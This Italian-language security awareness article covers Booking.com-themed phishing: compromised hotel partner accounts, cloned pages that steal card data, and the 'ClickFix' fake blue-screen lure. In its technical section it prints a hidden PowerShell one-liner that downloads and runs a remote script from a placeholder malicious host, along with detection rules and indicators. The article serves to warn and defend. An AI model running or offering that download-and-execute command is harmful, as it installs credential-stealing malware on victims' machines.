Attenzione: se ricevi un’email da Booking.com con dettagli precisi sulla tua prenotazione, non cliccare sui link! Verifica sempre direttamente sul sito ufficiale accedendo con il tuo account. Questa semplice azione ti salva da furti di carte di credito e malware.
Le truffe legate a Booking.com stanno aumentando, soprattutto nel settore turistico. I malviventi inviano messaggi che sembrano provenire dalla piattaforma, usando informazioni reali come ID di prenotazione, date di soggiorno e importi in euro. L’obiettivo è indurti a inserire dati sensibili su siti falsi, portando al furto di credenziali bancarie. Queste campagne colpiscono viaggiatori in Europa, Nord America e oltre, sfruttando il senso di urgenza per farti agire senza pensare.
Immagina di ricevere un’email che avverte di una cancellazione imminente della tua stanza d’albergo, con tutti i dettagli corretti. O una richiesta di verifica per una recensione negativa o una promozione esclusiva. Sembra tutto legittimo, ma è una trappola. Cliccando su ‘Vedi dettagli’ o ‘Conferma pagamento’, finisci su una pagina clonate che imita perfettamente Booking.com. Qui, oltre a rubare i tuoi dati inseriti, potrebbero attivare meccanismi nascosti per esfiltrarli in tempo reale.
Non si tratta di violazioni dirette dei sistemi di Booking.com, ma di attacchi ai partner come hotel e strutture ricettive. I truffatori comprometteranno gli account Extranet di queste strutture, usando i canali ufficiali per contattare gli ospiti con richieste di ‘conferma’ o ‘pagamento aggiuntivo’. Messaggi su WhatsApp o email con loghi perfetti, spesso generati con intelligenza artificiale, rendono l’inganno quasi irresistibile. Casi reali riguardano prenotazioni in hotel europei, con vittime che hanno rischiato perdite superiori a 1500 euro.
Perché funziona così bene? I criminali sfruttano il picco turistico, come periodi di vacanze, per massimizzare l’impatto. Usano dati reali ottenuti da breach locali negli hotel, rendendo i messaggi personalizzati e credibili. Aggiungono urgenza: ‘Agisci ora o perdi la prenotazione!’. Molti utenti, presi dalla fretta, inseriscono nome, cognome e dettagli della carta senza controllare.
Per difenderti in modo rapido:
- Controlla l’indirizzo email: Booking.com usa sempre domini ufficiali come @booking.com, mai varianti.
- Non cliccare link: Digita manualmente l’URL nel browser.
- Verifica con l’hotel: Chiama direttamente la struttura prenotata.
- Usa autenticazione a due fattori su tutti gli account.
Queste precauzioni bastano per la maggior parte degli utenti. Booking.com lavora con IA per rilevare frodi, ma la vigilanza personale è essenziale. Segnala sospetti al supporto della piattaforma e alle autorità come la Polizia Postale.
Approfondimento tecnico
Questa sezione esplora i meccanismi avanzati di queste campagne phishing, con dettagli per utenti tecnici e amministratori IT.
Meccanismi di attacco
Le email phishing incorporano ID di prenotazione reali estratti da database compromessi di hotel partner. L’analisi del codice sorgente rivela script PHP che esfiltrano dati ciclicamente, catturando input anche senza submit del form. Questo aumenta l’efficacia: nome, cognome, CVV e numero carta vengono inviati in background.
Un’evoluzione comune è la tecnica ClickFix, dove il sito falso simula un Blue Screen of Death (BSOD) di Windows. L’utente riceve istruzioni per ‘riparare’ incollando un comando PowerShell nel box Esegui (Win+R):
powershell.exe -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://malicious-url/payload.ps1')"
Questo scarica malware come DCRat o infostealer, che rubano credenziali salvate, cookie di sessione e dati di wallet. Il payload evade antivirus evolvendo obfuscation e usando living-off-the-land binaries (LOLBins).
Gruppi come Storm-1865, attivi dal 2023, adattano tattiche: AI genera loghi, firme email e testi personalizzati. Campagne dal dicembre 2024 colpiscono hospitality globale, con picchi in Europa.
Indicatori di compromissione (IoC)
- Domini cloni: varianti di booking.com con IDN homograph (es. bоoking.com con caratteri cirillici).
- PowerShell logging sospetto: Abilita con
Set-PSReadLineOption -HistorySaveStyle SaveIncrementallye monitora%ProgramData%e Startup. - File malevoli: Controlla
C:\Users\Publicper dropper.exe o script.ps1.
Difese avanzate
- Email filtering: Configura SPF/DKIM/DMARC per Booking.com.
- EDR deployment: Usa tool come Microsoft Defender for Endpoint per rilevare PowerShell abuse.
- SIEM rules: Allerta su
powershell.exe -ExecutionPolicy Bypasso download da IP sospetti. - Per host: Rinforza Extranet con MFA, monitora accessi anomali e usa API Booking per validare prenotazioni.
| Tecnica | Descrizione | Mitigazione |
|---|---|---|
| Phishing email | Dati reali per credibilità | Verifica mittente + accesso diretto |
| Sito clone | Esfiltrazione PHP ciclica | Analisi URL + HTTPS check |
| ClickFix/BSOD | PowerShell malware | Disabilita macro + EDR |
| Account hijack | Extranet compromessi | MFA + logging |
Evoluzione e trend
Dal 2024, integrazione AI rende attacchi più sofisticati: deepfake loghi, testi contestualizzati. Booking.com risponde con sistemi proattivi IA-based, limitando impatti. Tuttavia, compromissioni locali persistono. Statistiche indicano +30% frodi hospitality nel 2025, con focus su pagamenti contactless.
Per tecnici: Analizza traffico con Wireshark per callback a C2 server. Usa VirusTotal per hash payload noti. Educa team con simulazioni phishing.
Fonte: https://www.redhotcyber.com/post/phishing-booking-nuova-campagna-mirata/
